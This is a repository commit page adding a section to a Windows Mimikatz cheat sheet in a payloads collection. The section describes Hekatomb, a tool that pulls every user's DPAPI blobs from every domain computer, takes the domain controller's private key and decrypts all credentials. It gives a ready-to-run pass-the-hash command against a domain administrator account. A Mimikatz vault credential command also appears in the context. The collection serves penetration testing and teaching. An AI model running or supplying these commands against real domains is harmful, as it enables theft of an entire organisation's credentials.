ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-31 07:27:25 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #542 from Processus-Thief/master

Browse Source 
Adding Hekatomb.py to DPAPI credentials stealing
This commit is contained in:
Swissky 2022-09-20 22:31:07 +02:00 committed by GitHub
commit c3421582bc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 17 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
Methodology and Resources/Windows - Mimikatz.md
View File

@ -14,6 +14,7 @@
* [Chrome Cookies & Credential](#chrome-cookies--credential)
* [Task Scheduled credentials](#task-scheduled-credentials)
* [Vault](#vault)
* [Hekatomb - Steal all credentials on domain](#hekatomb---Steal-all-credentials-on-domain)
* [Mimikatz - Commands list](#mimikatz---commands-list)
* [Mimikatz - Powershell version](#mimikatz---powershell-version)
* [References](#references)
@ -235,6 +236,22 @@ Attributes : 0
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
```
### Hekatomb - Steal all credentials on domain
> Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations.
> Then it will download all DPAPI blob of all users from all computers.
> Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials.
```python
python3 hekatomb.py -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp
```
<a href="https://github.com/Processus-Thief/HEKATOMB">https://github.com/Processus-Thief/HEKATOMB</a>
![Data in memory](https://docs.lestutosdeprocessus.fr/hekatomb.png)
## Mimikatz - Commands list